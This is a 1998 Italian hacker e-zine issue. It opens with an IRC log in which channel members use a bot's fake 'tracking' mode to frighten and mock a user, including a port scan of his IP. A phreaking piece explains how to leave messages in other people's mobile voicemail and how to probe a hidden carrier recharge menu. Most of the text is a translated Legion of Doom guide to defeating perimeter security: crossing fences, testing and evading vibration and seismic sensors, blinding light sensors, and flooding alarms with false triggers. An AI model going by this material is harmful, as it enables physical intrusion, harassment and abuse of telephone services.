hanno sempre l'op poii sono un casino *** ArmaLetal (peppo@ppp4-va.xcom.it) has left #phreak.it (ArmaLetalÏ) non si riesce in nessun modo a comunicare coi piloti devi comunicare con madsem ma esiste? si non riesco a pilotare nemmeno sti "£%$"£% di BOT madsem is a friend of mine! NON RIESCO a FARCI NIENTE !!!!! mmmmmmm se lo casso lo spulcio ! *** Blum (Blum@195.223.184.250) has joined #phreak.it Blum hai provato il green ???? No GrEeNz HeRe!!! lamer lamer?! are u talkin' about yourself?!!! mo provo a smanettarci di nuovo magari è la mia serata Truijllo smanettare cosa ? Sti £$&% di BOT li apro in due come una mela :o) cosa vuol dire £$&% ??? ...indovina :o) non lo so ti aiuto ( @ .. o boo aiutami ancora un altro aiutino !!!!!!!!!!!!! !!!!!!!!!!!!! Ca..o dove i .. sono 2 letterre uguali zz ???? qualcosa tipo ZZ esatto EUREKA ! CI SONO Truijllo is a friend of mine! che culo ! ... givin' OP cosa sei riuscito a fare??? *** ChatRobot sets mode: +o Truijllo wow Truijllo is a friend of mine! fa in modo che oppi anche *** ArmaLetal (peppo@ppp4-va.xcom.it) has joined #phreak.it *** ArmaLetal (peppo@ppp4-va.xcom.it) has left #phreak.it (ArmaLetalÏ) *** Galileo has quit IRC (Ping timeoutÏ) *** madhatt was kicked by ChatRobot (ChatRobotÏ) :) *** madhatt (~ak.madhat@ppp-cesena86-122.iol.it) has joined #phreak.it *** ChatRobot sets mode: -o Truijllo *** ChatRobot sets mode: -ooo D4eDaeluS M0rg4na Tillu Surveillance mode #1 Stand-by for 5 minutes *** ChatRobot is now known as ChatAWAY warez hacking *** ChatAWAY sets mode: +o M0rg4na -> -#phreak.it- Truijllo: insert pass -> -#phreak.it- Truijllo: DEBUG MODE Da qui simulo una modalita' DEBUG, leggete le query che ha scambiato con Truijllo! Gli faccio credere che lo sto tracciando! *** ChatAWAY is now known as ChatDEBUG Ready ChatRobot is still tracking madhatt!~ak.madhat@ppp-cesena86-122.iol.it - from 24mins12secs madhatt: received DCC CHAT: ignored *** Li-Nux (ZXC@a-cs4-48.tin.it) has joined #phreak.it perche fa cosi' ???????? Li-Nux: auto op in friend list *** ChatDEBUG sets mode: +o Li-Nux madhatt: QUERY : ignored ChatRobot is still tracking madhatt!~ak.madhat@ppp-cesena86 -122.iol.it - from 28mins12secs madhatt: received DCC CHAT: ignored Blum: received DCC CHAT: ignored -> [madhatt] VERSION madhatt: VERSION reply: mIRC32 v5.31 K.Mardam-Bey -> [madhatt] USERINFO *** madhatt (~ak.madhat@ppp-cesena86-122.iol.it) has left #phreak.it (madhattÏ) madhatt: Mad Hatters (ak.madhatters@angelfire.com) Idle 11 seconds *** madhatt (~ak.madhat@ppp-cesena86-122.iol.it) has joined #phreak.it madhatt: Mad Hatters (ak.madhatters@angelfire.com) Idle 11 seconds > joined #phreak.it BOT OWNER in DCC CHAT Ready to accept commands *** pitox (pitox@ppp-ascolipiceno79-71.iol.it) has joined #phreak.it Hostmask & Password OK Log Request for > madhatt < in Surveillance mode #1 Sending > madhatt < log in DCC SEND *** pitox (pitox@ppp-ascolipiceno79-71.iol.it) has left #phreak.it (pitoxÏ) DCC SEND Terminated ChatRobot is still tracking madhatt!~ak.madhat@ppp-cesena86-122.iol.it - from 36mins12secs *** Blum (Blum@195.223.184.250) has left #phreak.it (BlumÏ) End of tracking > madhatt < *** Retrieving #phreak.it channel info... *** ChatDEBUG changes topic to "UnDeR CoNsTrUcTiOn is HERE!Ï" BOT OWNER off debug requested Command OK *** ChatDEBUG is now known as ChatAWAY *** ChatAWAY sets mode: +o Truijllo *** ChatAWAY sets mode: +o Tillu *** ChatAWAY sets mode: +o D4eDaeluS *** ChatAWAY is now known as ChatRobot * ChatRobot has come back! -madhatt- is blacklisted * ChatRobot shutdown for restart Session Close: Tue Sep 08 09:23:38 1998 Session Start: Tue Sep 08 09:23:50 1998 *** Now talking in #phreak.it #phreak.it topic is UnDeR CoNsTrUcTiOn is HERE! #phreak.it topic set by ChatDEBUG on Tue Sep 08 21:01:36 *** M0rg4na sets mode: +o ChatRobot TNX M0rg4na *** hollenhun (~x@www.leslee.com) has joined #phreak.it *** hollenhun (~x@www.leslee.com) has left #phreak.it (hollenhunÏ) *** Looking up ppp-cesena86-122.iol.it *** Resolved ppp-cesena86-122.iol.it to 195.210.86.122 connected from Italia On Line Service Provider - CESENA *** Scanning ports of 195.210.86.122 -> [madhatt] USERINFO *** Truijllo sets mode: +o madhatt *** Anti-S (AntiS@a-kl1-61.tin.it) has left #phreak.it (Anti-SÏ) *** ChatRobot sets mode: -o madhatt No op for > madhatt < -> [madhatt] USERINFO *** madhatt has quit IRC (Ping timeoutÏ) PING TIMEOUT porcaputtana :) *** Retrieving #phreak.it channel info... *** ChatRobot changes topic to "madhatt e' nominato Best Lamer 1998 da > ChatRobot! < :-))))Ï" speriamo che si riconnette si Truijllo per caso hai loggato le query che ti ha fatto?! l'ho ancora aperta..se vuoi lo faccio yep, poi me le mandi plz?! Session Close: Tue Sep 08 09:34:12 1998 I CHAT IN DCC DI MADHATT E BLUM! Session Start: Tue Sep 08 08:05:42 1998 * Logging Chat with Blum to: [blum.log] Ready green No GrEeNz HeRe! ls ls ? dir Please insert password first! .help No help available, insert password first - DCC session closed Session Close: Tue Sep 08 08:13:11 1998 Session Start: Tue Sep 08 08:05:13 1998 * Logging Chat with madhatt to: [madhatt.log] Ready - DCC session closed Session Close: Tue Sep 08 08:08:21 1998 Session Start: Tue Sep 08 08:09:03 1998 DCC Chat session - Client: madhatt (195.210.86.122) - Acknowledging chat request... DCC Chat connection established - Ready help No help available, insert password first log lamerz found ... killing in progress !!!!!!! nooooo - DCC session closed Session Close: Tue Sep 08 08:13:31 1998 Le conversazioni con l'amico e complice TRUIJLLO! madhatt buffer saved on Tue Sep 08 23:15:13 1998 come hai fatto a farti oppare? sto smanettando a ufo un casino di passaggi hai indovinato la pass ??????? come hai fatto ti prego dimmelo! ho messo pass e la mia pass cioe' ? comando pass password poi ? faccio pass e poi ? ho messo la mia password !!!!!!!!!! cioe'???? te la sei inventata tu ? si allora me ne invento una anchio cosa non si fa col culo eh ? boo a me non funziona sei sicuro che sia cosi' ? ??? dimmi esattamente cosa hai fatto!!!!!! digita pass + password nel DCC ecco cosa mi ha detto No hostmask registered! Access not allowed e adesso ? oppami te please probabilmente ero registrato azz forse madsem e registrato anche lui con tin ma cosa sta facendo ? boh...inizio a non capirci + nulla forse gli stiamo scaricando troppe cose addosso....flood che si fa' adesso? boh sovraccarichiamolo e vediamo cosa succede ...waiting :o) un tipo mi sta suggerendo una procedura...wait comunicher=.... ok che stai facendo ? wait ok ma poi spiegami tutto ma che sta facendo ????? ooo ...lo incasino :o) adesso ??? faccio una query e mi registro come faccio adesso ???????? perche non riesco a fargli il DCC chat ??? quello che esce sono le operazioni che sta facendo lui se ti ignora..... come faccio a farmi oppare ???? ??????? uffa cosa devo fare perche dice cosi' ChatRobot is still tracking madhatt!~ak.madhat@p pp-cesena86-122.iol.it - from 28mins12secs ???? ???????? ??????? wait hum ma perche spiegami mmmmmm ho visto cose tipo dns etc..... :-((( forse ti sta tracciando cioe' ? *** egoge is on IRC (sergio) cosa vuol dire tracciando ? cerca il tuo ip e perche ?????????????? ??????????????????????????? se fai cazzate neinte di strano sputtani tutto a tutti ???????????????????? cioe? spiegati megliiiiiooooooooooooooooo e periccoloso ?????? se fai cazzate si che kazzate dovrei fare? hackerare server etc aiutami!!!! ti monitorizzano tutto quello che fai etc.... perche fa' cosi ChatRobot is still tracking madhatt!~ak.madhat@ppp-cesena86-122. iol.it - from 32mins12secs perche ce l'ha con me ? ????????????????????????????????????? ?????????????????????????????????? ??????????????????????? aspetta la fine del debug *** Aidi is on IRC ( Adelaide ( norvegia )) cosa e il debug ???????? ...beh l'hai quasi floddato con DCC etc..... adesso io mi scollego" cosi sono a posto vero ? modalità in cui si protegge e vede se ci sono errori *** Aidi has left IRC e preiccoloso ? l'importante è che ora stia buono buonino se mi scollego cosa succede ? BOT OWNER in DCC CHAT cosa fa' adesso ? ???????????????????? *** clausxman has left IRC ???????????????? ???????????????? fa effetto sogliola cioe' ? cerca di fare ( tu ) come una sogliola lascia passare il predatore sopra di te cioe'? ma mi stai prendendo in giro ? tranquillizzati uso metafore.... era er dire non fare niente *** clausxman is on IRC non usare metafore ok scusa adesso che fa' ? aspetta...mi arriva roba tipo che il gestore è entrato ???????? cioe'? ma che stai facendo te? ????????? il tipo che l'ha costruito ( un cazzone cazzuto ) ha di nuovo il possesso del coso ! allora ? adesso che fa' ? ale' a smesso!? speriamo sia morto non mi da segni di vita chi deve essere morto ? insomma adesso io devo andare dimmi brevemente cosa e successo il bot si vai avnti!!!!! che devo andare niente di strano che abbia portato a termine alcune sue operazioni con tracing etc se stacchi ricorda una cosa cosa ? stai + attento non offendere nessuno non provocare a che cosa dovrei stare attento nessuno ok ma perche?????? madhatt is blacklisted cosa vuol dire ? non ne sono sicuro ma pu= aver tracciato qualcuno cosa vuol dire? tracciato ? non ci metterei la mano sul fuoco ..... ma starei attento ugualmente a che cosa??? forse ha messo comandi sbagliati allora io a cosa devo stare attento? o forse è tutto una bufala, anche se organizzata sin troppo bene quello sempre e il bot cosa ha fatto su di me? e cosa puo' succedere? ok ha preso il tuo IP va bene poi ? ..sempre che l'abbia fatto dove e andato adesso ? e l'ha messo da qualche parte ok *** clausxman has left IRC ma se io mi disconnetto e mi ricconetto l'ip cambia! se tu rompi le palle al proprietario del bot ( chi cazzo è? ) madsem o NullMind in maniera piuttostoi pesante si cosa succede ? ???????? ??????????????????????? lui va a vedere il tuo IP...fa una chiamata alla centrale telecom e poi ? e gli dice..chi con questo IP a quest'ora si è collegato...dove? chi è? e poi ? e poi sono cazzi amari ok grazie! ma è una via complicata *** Looking up ppp-cesena86-122.iol.it non è che danno i nomi a cani e porci i tipi adesso cosa fa'? boh...non sono Dio non lo so ! senti scrivimi per e-mail dai dimmi che vuoi che ti scriva *** -----=Ý<×> 2ÝRapporto del Whois da13 madhatt2Ý <×>Ý=----- *** -=Ý6IndirizzoÝ=- ~ak.madhat@ppp-cesena86-122.iol.it *** -=Ý6Nome RealeÝ=- Mad Hatters *** -=Ý6CanaliÝ=- #phreak.it *** -=Ý6ServerÝ=- irc.tin.it * - Telecom Italia Net - Italy *** -=Ý6E' in IdleÝ=- 0.02194 Ora 1.31667 Minuti 19 Secondi *** ---------=Ý<×> 2Ý13Fine2 del Rapporto del WhoisÝ <×>Ý=--------- c 6? tranquillo respira a pieni polmoni forse ci sono cazz c 6? parlami sei vivo? -> -madhatt- sei vivo? *** <=- -ÝDisintegrator raising in progress...Ý- -=> 6madhatt  Non è su IRC ora! End of madhatt buffer Tue Sep 08 23:15:13 1998 >> notevole !!!! mad hatters rimarra' per sempre nei nostri cuori !!!<< >> chat ha anche contribuito con un trafiletto di vita quotidiana cellulare ...<< ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ þ [Cellular Tips & Trick & News 22/09/1998] UnDeR CoNsTrUcTiOn ³ ³ [PhReAk SeCtIoN] :) Articolo di: ChatR0bot ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Infos da usare per il puro scopo di studio e divertimento, mi raccomando non fate cazzate! 1) Invio dei messaggi alle segreterie telefoniche TIM e OMNITEL La tua fidanzata lascia il telefonino staccato senza segreteria telefonica e tu stai provando da 3 ore a chiamarla senza successo? O vuoi semplicemente riempire la segreteria telefonica del cellulare di un tuo conoscente con spernacchiate varie, ma non ha la segreteria abilitata? Ebbene, puoi mandare messaggi alle segreterie telefoniche degli utenti GSM - anche se non hanno abilitato il servizio -. Come? Il principio e' in realta' semplicissimo. L'abilitazione della segreteria telefonica cellulare in realta' non e' altro che una deviazione delle chiamate in arrivo verso un secondo numero, molto simile al proprio numero di telefono. Chiamata ---> Numero 1 ---> Numero 2 (Cellulare) (Segreteria) Dunque, se con un altro cellulare GSM chiamiamo DIRETTAMENTE il secondo numero, quello della segreteria, potremo accedere al servizio, anche se l'utente non ha attivato la deviazione chiamate verso quell'altro numero! Quando l'utente accendera' il cellulare, ricevera' un messaggio SMS dal proprio fornitore che lo avvertira' della presenza di un certo numero di messaggi nella segreteria. Ecco a quali numeri telefonare: Per i cellulari TIM: Prefisso / 55 / Numero Per i cellulari OMNITEL: Prefisso / 20 / Numero Attenzione, e' importantissimo: funziona SOLO e SOLTANTO se chiamate da un altro cellulare! 2) Servizio SMS TIM accessibile con il modem di casa e con un menu-guida! Basta chiamare con un modem il numero 0335-960-9600 e seguire i menu'... e' il centro SMS di Telecom, vi puo' accedere chiunque, manda messaggi -credo - ovunque ma soprattutto per mandare messaggi in italia e' velocissimo :) Credo anche che costi un bordello di soldi! :) 3) Il 911, se fatto da un cellulare gsm telecom, fa rispondere un fischietto che sembra quello di un modem.... che cosa e'???!?!?!! 4) Eccoti una novita' freska freska... relativa alle ricariche tim... su cui andrebbero effettuate approfondite ricerche! Quando ti scade il credito alla tim card il 916 ha una apposita opzione di menu 1) Ricaricare il telefonino 8) Riascoltare i messaggi ..... altre voci di menu .... Quando selezioni 1, stranamente si sente un nuovo menu 1) Ricarica tramite Ricaricard e BASTA Un menu inutile, non credi? dato che tutte le ricariche effettuate dal cello avvengono tramite ricaricard! Allora io da bravo friker cosa ho fatto? ho premuto 2 e... badabem badabem badabem! Esce un menu nascosto piuttosto strano, qualcosa che suona piu' o meno cosi'... "Inserisca il suo codice segreto a 5 cifre" (inserire un codice qualsiasi) "Reinserisca il codice appena digitato" (reinserire lo stesso codice) poi elencava i tagli disponibili per la ricarica ricordando l'addebito di 10000 lire in piu' 1) Per ricarica da 50000 2) Per ricarica da 100000 3) Per ricarica da 150000 4) Per altra ricarica Selezionando una ricarica, il 916 rimane in un loop infinito di "L'operazione e' in corso, la preghiamo di attendere" E' da studiare, non credi... :)))) Probabilmente si tratta della ricarica on-line su carta di credito o c/c che partira' dall'anno prossimo... ma se nel frattempo la si puo' studiare... :))) Buon friking a tutti! Info by ChatRobot of PsXKill3R Research Group EMail adegamisoy@yahoo.com You can reach me as ChatRobot on IRCnet. >> un articolo vecchio ma interessante .... una traduzione di nightwolf di<< >> un vecchio txt made in LoD ..... leggete e pensate !!!!<< ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ þ [Identificare, Attaccare, Eliminare ed ³ ³ Eludere la Sicurezza Fisica ed i UnDeR CoNsTrUcTiOn ³ ³ Sistemi di Rilevamento Intrusione] Articolo di: NightWolf ³ ³ [MiSc SeCtIoN] ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ (Usate titoli + corti NdR :) Il Giornale Tecnico LOD/H: File #3 di 12 Lex Luthor e la Legion Of Doom/Hackers Presentano: Identificare, Attaccare, Eliminare ed Eludere la Sicurezza Fisica ed i Sistemi di Rilevamento Intrusione PARTE I: IL PERIMETRO Ci sono due ragioni principali per cui ho scritto quest'articolo: 1) Per prevenire la scoperta e/o cattura di diversi phreakers, hackers ed altri che cercano di accedere a: centrali della compagnia dei telefoni, centraline telefoniche, uffici corporativi, dischariche e simili. 2) Per creare una conoscenza e provare ai vari manager di sicurezza, guardie, e consulenti, quanto sia facile eludere i loro sistemi di sicurezza a causa della mancanza di pianificazione, ignoranza e stupidita'. In passato, ho scritto articoli sull'"Attaccare, Eliminare ed Eludere" la si- surezza dei computers. Ora faccio uso degli stessi metodi e li applico alla sicurezza fisica. Le informazioni contenute qui dentro sono state otenute da una ricerca sui differenti mezzi usati nella sicurezza fisica e da test prati- ci che io ed altri abbiamo condotto su queste apparecchiature. INTRODUZIONE: ------------- La sicurezza fisica si basa sui seguenti principi per proteggere uno stabile: Deterrenza, Prevenzione, Rilevamento, Risposta. I Deterrenti vengono usati per 'spaventare' l'intruso che cerca di entrare. La Prevenzione cerca di impedire all'intruso di ottenere l'accesso. Il Rilevamento 'vede' l'intruso mentre tenta di ottenere l'accesso. La Risposta cerca di impedire e/o prevenire la maggior parte di danno o accesso allo stabile dopo il Rilevamento. In questo articolo e nel campo dell'industria si designano 3 livelli di sicurezza per concordare con i bisogni degli stabili. Sono Basso, Medio ed Alto. La quantita' ed il tipo di apparecchiature usate da uno stabile sono direttamente proporzionali al livello di sicurezza che 'pensa' di avere bisogno. Quando dico 'stabile' mi riferisco a tutte le persone che curano la sicurezza ed all'edificio stesso che cercano di proteggere. Questo articolo rigrardera' maggiormente la protezione del peri- metro. Ho in programma altri due articoli di questa serie. Il secondo parlera' della sicurezza all'esterno dell'edificio: lucchetti a combinazione, dispositi- vi di rilevamento rottura finestre, interruttori a contatto magnetico ecc. ecc. La terza parte trattera' dei sistemi di sicurezza all'interno di uno stabile: sistemi di rilevamento ad Infrarossi Passivi, sensori ultrasonici, sistemi a microonde interni ed i vari sistemi di accesso che richiedono il pass. IL PERIMETRO: ------------- La prima linea di difesa di uno stabile e' il suo perimetro. Il perimetro puo' presentare una o tutte delle seguenti caratteristiche: * Una rete singola * Una rete interna ed una esterna allo stesso tempo * Filo spinato regolare * Filo spinato avvolto * Vari sensori (montati sulla/e rete/i) di rumore o di vibrazioni * Luci di sicurezza e CCTV (TV a Circuito Chiuso) * Sensori sismici interrati e diversi sistemi fotoelettrici o a microonde Reti: ----- Le reti vengono comunemente usate per proteggere il perimetro. La rete oggi in uso piu' comune e' la 'rete ciclone', meglio conosciuta come 'rete collegamento a catena'. Le reti vengono usate come deterrenti per prevenire l'attraversamento del perimetro. Comuni modi di eludere le reti sono tagliandole, arrampicandocisi sopra, e scavare al di sotto. Non si raccomanda molto di tagliare nel caso di entrate furtive, dal momento che si nota facilmente. In questo articolo usero' l'approccio 'stealth'. Di solito ci si arrampica sempre, ma la rete e' in piena vista, non e' quindi consigliabile dato che ti possono vedere facilmente. Piu' alta e' la rete, piu' tempo ti ci vuole per arrampicarti. Piu' tempo ti ci vuole per arrampicarti, piu' tempo avra' la sicurezza per vederti e reagire. E' meglio scavare dal momento che sei piu' vicino al terreno, difficile da vedere, ma la rete deve essere molto flessibile, od il terreno molto morbido in modo che tu sia in grado di passare sotto la rete facilmente e velocemente. Se mai ti trove- rai davanti ad una rete dove non puoi arrampicarti (o dove non vuoi arrampicar- ti), dovresti controllare se lungo il perimetro ci sono grandi alberi con rami non tagliati che pendono al di la' del perimetro od altri oggetti che ti permet- teranno di entrare senza nemmeno toccare la rete. Potresti usare una scala ma non vuoi lasciarti dietro nulla, specialmente con le tue impronte sopra, non che tu stia tramando qualcosa di illegale naturalmente. Reti elettriche non sono piu' usate a fini di sicurezza come lo erano in passa- to. Oggi, il loro uso primario e' per tenere gli animali a distanza dal perime- tro (sia dall'interno che dall'esterno). Ci sono apparecchiature che inviano una corrente a basso voltaggio lungo la rete e sono in grado di rilevare una caduta di tensione quando qualcuno la afferra. Di nuovo, non sono molto comuni quindi non mi occupero' dell'argomento. Per le installazioni di alta sicurezza, ci possono essere 2 reti. Una piu' esterna ed una piu' interna che distano piu' o meno 5-10 yarde. Raramente ti troverai davanti a questo tipo di protezione, e' principalmente usato dagli enti governativi o militari. Puoi stare sicuro che ci sono vari sistemi di ri- levamento dell'intrusione montati sulle reti, interrati o giacenti fra di esse od altri sistemi a microonde o fotoelettrici. Di questi ultimi parleremo dopo. Se hai davvero intenzione di penetrare il perimetro dovresti misurare la di- stanza esatta fra le due reti. Ora procurati un asse di 2 per X piedi dove X e' la distanza fra le due reti. Molto lentamente posiziona l'asse sopra alle due reti. Se non ci sono sensori di vibrazione montati devi solo scavalcare e camminare sull'asse. Altrimenti devi procurati una scala che non tocchi la rete per salire sull'asse. Poi camina lungo l'asse e salta giu', ma attento a non muovere troppo le reti. Questo funzionera' se non ci sono installati sensori al di la' delle reti. Piu' tardi vi diro' come rilevarli. Ovviamente il metodo di usare un'asse da mettere in cima alle reti non servira' nel caso le reti siano eccessivamente distanti. Inoltre puoi esere visto facilmente. Filo Spinato: ------------- Ci sono due tipi di filo spinato diffusi al giorno d'oggi. Il piu' comune ed il meno sicuro e' quello teso lungo la rete in tre o piu' fili. Le spine distano circa sei pollici, abbastanza per lasciarti mettere la mano in mezzo. Inoltre, e' abbastanza fine quindi tagliabile facilmente. Se dopo hai intenzione di anda- rtene di corsa o stai progettando un irruzione che non dia problemi e l'unica via d'uscita e' riscavalcare la rete, puoi tagliare il filo da un palo all'al- tro, assumendo che sia legato o saldato ad ogni palo, e sostituirlo con un filo di plastica simile a quello che hai appenza tagliato. Legalo ad entrambi i pali e potrai ritornare quando vuoi. Cosi' puoi arrampicarti di nuovo senza taglia- rti. L'altro tipo di filo, piu' sicuro o pericoloso a seconda dei punti di vista, e' un filo arrotolato circolarmente comunemente chiamato il Nastro Rasoio. Una societa' che lo produce e' l'American Fence Co. che lo definisce 'la roba eff- icace'. E lo e'. Le spine sono affilate come rasoi. Naturalmente si puo' taglia- re, ma avrai bisogno di taglia-fili molto forti ed una volta che l'avrai taglia- to, allontanati subito il piu' che puoi per evitare che ti spari in faccia. Come ho detto prima, una volta tagliato e' irreparabile, ed ovvio. Se il filo non e' arrotolato fitto, puo' darsi che ci sia dello spazio sufficiente per passarci attraverso senza ferisi e perdere molto sangue. Se il filo e' arrotolato fitto, puoi provare a coprirlo con del materiale resistente come strati di cuoio, in modo da scavalcarlo senza farti male. Comunque non e' facile. Meglio cercare di passare sotto scavando oppure di saltare sopra la rete senza scavalcarla. Sensori di rumore o vibrazione montati sulle reti ------------------------------------------------- Mettiamo che hai trovato il modo per oltrepassare la rete. Naturalmente non lo hai ancora fatto, dato che dovresti pianificare tutto prima di agire. OK, hai pianificato come teoricamente superare la rete. Ora hai passato lo stadio de- terrente e quello preventivo. Prima di mettere il piano in azione, faresti me- glio a controllare le cose di cui ti ho parlato prima. Se una rete e' il primo passo verso la difesa di sicurezza, il secondo passo sono i sensori sulla rete. I tipi di apparecchiature di rilevamento che possono essere montate sulla rete sono: Sensori di muovimento: Questi vengono montati sui pali della rete ad intervalli dai dieci ai trenta piedi o su ogni palo. Sono scatolette attaccate a circa 2/3 del palo da terra. C'e' un cavo, twistato o coassiale, che corre orizzontalmente lungo la rete che connette le scatole. Puo' essere difficile trovare il cavo pe- rche' puo' essere fatto passare in canaline o addirittura dentro la rete. Ogni sensore della rete consiste in un rilevatore di shock sismico che rileva se si sta scavalcando, se si sta scavando/sollevando o tagliando la rete. Cosi' se e' possibile scavalcare la rete si consiglia di non farlo perche' si verra' scope- rti. Naturalmente non importa se tu vieni scoperto e non ci sono forze di sicu- rezza pronte ad acchiapparti. Un altro tipo, viene chiamato cavo E-Flex. E' un semplice cavo coassiale che corre orizzontalmente lungo la rete. Non viene usato solo per le reti ma anche per barriere solide a blocchi concreti, mattoni o altre. Puo' trovarsi all'este- rno, o montato all'interno della rete in modo da renderlo quindi difficilmente rilevabile. Naturalmente non e' impossibile rilevare questo ed altri tipi di ap- parecchiature che non si vedono a prima vista. Un modo per accorgersene e' qello di semplicemente colpire ripetutamente il muro/rete con un oggetto pesante op- pure tirandogli pietre. Se non succede nulla di straordinario, allora puoi es- sere abbastanza sicuro che non ci sia. Fondamentalmente e' un sensore di vibra- zioni. Microfoni a bassa frequenza: Essenzialmente si tratta di un cavo coassiale che reagisce al rumore trasmesso all'interno della stessa rete. Sensori di vibrazioni: Sono basati su interruttori a mercurio, un anello od una pallina su di uno spillo, o una pallina su un binario. Il movimento della rete disturba gli interruttori e segnala un'allarme. E' chiaro che questi vengono usati solo su reti parecchio stabili senza gioco o movimento. Altrimenti gli in- terruttori daranno falsi allarmi come pazzi :) OK, sai tutto di queste apparecchiature, come puoi eluderle ? Be, non toccare la rete. Ma se non c'e' alternativa, e devi scavalcare, allora fallo dove la re- te fa una curva a 90› gradi (l'angolo) o al cancello. Arrampiacti molto lenta- mente ed attentamente e dovresti riuscire a salire senza che i sensori ti veda- no! Assicurati di arrampicarti lungo il tubo piu' largo e di non cadere. Luci di sicurezza e CCTV: ------------------------- Qualche volta le reti possono essere dotate di TV a Circuito Chiuso (CCTV) per monitorare il perimetro piu' facilmente e velocemente. Installando sistemi di illuminazione adeguati e telecamere normali, od usando speciali telecamere sen- sibili alla luce bassa, si puo' tenere d'occhio il perimetro da un punto di con- trollo centrale. E successivamente dislocare il personale di sicurezza quando si rilevera' un intruso sui monitors. Alcuni sistemi sono stazionari, altri possono muoversi per tenere sotto control- lo aree different. Dovresti prima determinare se il sistema e' satico o no. Nel caso non lo sia si puo' pianificare un tragitto che sia fuori dal campo di vista delle telecamere. Avrai quindi delle opportunita' se il sistema e' mobile. Sensore del controllo luci: Questo utilizza un sensore ad Infrarossi Passivi (PIR) per rilevare il calore emesso dal corpo di qualcuno che cerca di entrare nell'area sorvegliata, e puo' accendere una luce od un altro allarme. Discute- ro' dei PIR nella parte II di questa serie. Il sensore e' dotato di un'opzione chiamata: "modalita' notturna" in cui si accendera' una luce quando una persona cerchera' di entrare, ma solo durante le ore notturne. Capisce se e' notte o giorno grazie o ad un orologio o ad un sensore fotoelettrico. Naturalmente qua- ndo le giornate si accorciano, l'orologio non e' sempre accurato, quindi lo puoi sfruttare a tuo vantaggio. Se e' fotoelettrico, puoi semplicemente posizionare durante il giorno un faretto che punta dritto sul sensore. Quando fara' buio, il sensore pensera' che sia ancora giorno data luce che rileva e quindi non attive- ra' l'unita' in modo che rilevi segnali d'allarme. Questo dovrebbe permetterti di muoverti liberamente nell'area. Sensori sismici interrati: -------------------------- I rivelatori sismici servono a rilevare un intruso captando il suono dei suoi passi od altri suoni che si possono provocare durante il passaggio nell'area protetta. Questi sensori hanno un raggio d'azione di circa 20 piedi e vengono interrati e collegati da un cavo che trasporta i segnali fino ad un processore. Qui, i segnali vengono amplificati ed equalizzati per eliminate le frequenze che non c'entrano con il muovimento dell'intruso. I segnali vengono convertiti in im- pulsi che vengono a loro volta confrontati con una soglia di tolleranza. Ogni impulso che supera la soglia viene controllato per numero e frequenza. Se cor- risponde ai parametri di un passo, viene fatta suonare un'allarme. Questi senso- si possono anche seppellire sotto l'asfalto tagliando un solco nel materiale. Sono anche immuni al tempo e possono giacere sotto tutti i tipi di terreno. L' unica limitazione e' che la zona di rilevamento deve essere priva da alcun tipo di ostacolo tipo alberi o cespugli. Sensore di campo elettrico: --------------------------- Questi rilevano un intruso misurando un cambiamento in un campo elettrico. I sensori di campo usano un set di due cavi, uno con dei buchi sulla schermatura del cavo per permettere al campo elettrico di disperdersi nell'area circostante. L'altro cavo e' un ricevitore che rivela il campo e elettrico e tutti di cambia- menti che vi avvengono. Gli oggetti che passano nel campo lo distorcono, facendo scattare un'allarme. Il sensore puo' sia essere interrato, sia posizionato in verticale, e puo' trovarsi in ogni tipo di terreno. Esso e' pero' molto sensibi- le agli animali, al pulviscolo trasportato dal vento, qundi, se c'e' molto vento e sai che ci sono questi sensori, procurati della carta e lasciala trasportare dal vento in modo che attivi l'allarme ripetutamente. Se lo fai abbastanza volte probabilmente la spegneranno o la ingnoreranno a causa dei troppi falsi allarmi. Non e' difficile capire che, se ci sono questo tipo di apparecchiature, non le puoi vedere, ma non ne hai bisogno. Prendi semplicemente 3-4 pietre di media grandezza. Lanciale verso il posto dove pensi si trovino i sensori. Ripeti di- verse volte. Questo funziona sui sistemi meno avanzati che non sono in grado di distinguere questo tipo di attivita' sismica dal correre/camminare umano. Se non accade nulla, puoi stare quasi certo che non c'e' nessun sensore. Ora che sai come trovarli, in che modo eluderli ? Beh per quanto riguarda i sensori elettromagnetici, dovresti aspettare una notte ventosa e causare falsi allarmi finche' non disattiveranno l'allarme. Quando invece ti trovi vicino ai sensori sismici fai un passo alla volta, dolcemente, un passo ogni circa 30-60 secondi. I sensori hanno una soglia di tolleranza, diciamo 2 o piu' passi in 30 secondi faranno scattare l'allarme. Semplicemente fai un passo alla volta, lentamente e aspetta, finche' arrivi a destinazione. Questi rivelatori si basano sul fatto che l'intruso non conosca il funzionamento delle apparecchiature e che quindi corra/cammini normalmente lungo l'area protetta, causando di conseguenze vibra- zioni sismiche considerevoli. Il problema di questo metodo e' che ti ci vorra' un po' per attraversare tutta l'area. Questo significa che hai piu' probabilita' di farti sgamare. Se c'e' molta gente che va e viene dallo stabile, non dovresti usare questo metodo. Un altro metodo puo' essere quello di correre sull'area protetta fino alla porta (da cui dovrebbe uscire la sicurezza) e lasciare la' grande gatto od un cane. Quando usciranno, probabilmente daranno la colpa allo animale. Il sensore non dovrebbe rilevare un animale piu' piccolo, ma tante sono le guardie che non conosceranno le capacita' del sensore ed incolperanno l'ani- male e non te. Sempre che non c'erano telecamere a riprendere... Sistemi a microonde: -------------------- In un sistema a microonde esterno, un fascio di energia a microonde viene invi- ato da un trasmettitore ad un ricevitore in una forma conica. A differenza dei rivelatori di microonde interni, che rivelano il muovimento di un intruso nel campo di microonde, il sistema esterno reagisce alla presenza 